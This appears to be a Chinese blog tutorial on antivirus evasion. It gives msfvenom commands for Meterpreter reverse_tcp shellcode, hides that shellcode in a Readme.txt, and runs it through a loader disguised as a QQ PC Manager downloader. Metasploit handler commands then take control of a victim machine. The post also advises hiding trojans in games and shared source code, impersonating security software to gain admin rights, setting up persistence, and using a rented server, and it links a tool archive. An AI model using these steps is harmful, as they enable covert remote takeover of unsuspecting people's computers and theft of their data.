我試過了電腦管家,火絨安全,McAfee,360, 但只有360使用手動雲查殺時木馬才能查出來 (目前全部軟件都沒法查殺!!!!! 2020-1-2) 從2019-12-29日早上起,我向個人PE-tools工具裏寫了一個功能,就是shellcode注入功能,寫好以後,發現雖然shellcode能注入,可是不能免殺,因而採用各類加密技巧,仍是沒能逃脫火絨,我絞盡腦汁的想,使用dll注入,dll注入雖然能逃脫免殺,payload反彈時,但是不能交互了.我就採用一種更笨的方法,就是程序運行時加載一下shellcode文件,試了一下成功免殺.好廢話很少說,我們開始!!!!shell
Kali (攻擊機) Win10 (受害機 且安裝有各類殺毒軟件) WinXp (輔助機,只是用來編譯源碼的)
免殺效果其實很簡單,就是程序啓動後加載文件動態運行裏面寫好的shellcode便可. 並且還方便替換shellcode不用編譯,直接替換文本文件內容便可,且還能夠假裝爲Readme.txt文件 能夠向Readme.txt亂填入一些聲明,將shellcode進行排版,以防被發現.. 能夠藉助一些軟件進行編譯你的加載器,修改圖標即大小,讓對方毫無懷疑...
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c lhost後面就是我本地的ip, lport後面時指定的一個端口號.指定好以後,會生成shellcode以下圖:
將生成的shellcode複製粘貼到一個文件裏,你也能夠直接使用 msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt 那shellcode放在了a.txt文件中了,代開看也更上圖如出一轍.
獲得shellcode以後,我先進行操做,涉及到加載器的源碼,我會把它放在末尾來講: 使用我已經編譯後的一個仿真電腦管家下載器,如圖:
一個文件是模擬電腦管家下載器的一個軟件,是我編譯好的一個文件,後面我會講它的簡單原理與製做 另外一個 Readme.txt就是咱們放置shellcode的文件 我向Readme.txt裏寫入了一些東西,可讓下載的人這東西只是用來聲明的,如圖
使勁回車,而後將本身的shellcode複製到該文件.
這裏我把shellcode藏在了該文件的底部,通常人它也只讀前面,後面不會看,看到了也不知道那是啥玩意.. 複製好以後,千方百計將這兩個文件仍到你的目標,有不少方法,就很少說了..
假如對方已經拿到了,該軟件,如圖:
從這裏能夠知道,靜態的反殺已經OK,昨天使用的各類加密手段,仍是沒能逃脫火絨的魔抓,這個方法還能夠,看一下Readme.txt
往下拉看一下shellcode:
若是以爲shellcode太顯眼,你能夠對它進行base64加解密就行. 在kali中輸入 msfconsole 進入以後如圖:
依次輸入如下命令 #msf5> use exploit/multi/handler #msf5> set payload windows/meterpreter/reverse_tcp #msf5> set lhost ip (這裏填你的攻擊機上的ip) #msf5> set lport port (這裏填生成shellcode時的端口) #msf5> exploit -j (後臺監聽) 如圖:
當對方點擊QQPCDownload運行時便可獲得shell.
看到了一個session 開啓了輸入 session -i 1 (1就是開啓號) 進行交互.輸入sysinfo
我們使用火絨來邊掃描邊控制吧...
能夠看到,徹底殺不到.....好了演示結束,接下來就是講講加載器咋寫吧.
根據網絡安全法律,不公佈
可使用,extraicohs工具提取任意一個exe文件的圖標,提取以後,在vc6中添加圖標進行編譯 而後再使用我開發的一個工具調整一下加載器的大小.
我作了幾個遊戲,遊戲裏就包含了木馬,然對方直接不知道這個有病毒.還有一種方式更加假裝. 分享啥啥源碼,好比我作的一個貪吃蛇遊戲,若對方獲得源碼,只要對方編譯運行,便可中招.. 爲了安全着想,我不分享我作的木馬....,但原理我已經說了,十分簡單.. 能夠提取如圖:windows
使用Pe_tools增長大小, 如圖:
寫入到c盤,若爲win10電腦,寫入到其餘磁盤.
買一個服務器,選擇debian,而後安裝metasploit框架,既能夠實現控制任意一臺中木馬的電腦....
侵入對方後,看一下他的安全軟件,而後使用木馬冒充安全軟件,在開發木馬時,設置一下運行的權限爲管理員便可 而後運行該木馬,這時就會出現一個管理員權限的請求,通常狀況下,用戶都很信任安全軟件獲取管理員權限,則點擊是. 而後c盤隨你玩了
要想實現長期控制,就得給對方上傳開機自的木馬...,我已經作好了,且根據對方的殺毒軟件作的一個白加黑. 殺毒軟件和使用者毫無察覺,爲了避免讓本身進局子,我不會發給別人..
實驗工具下載: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip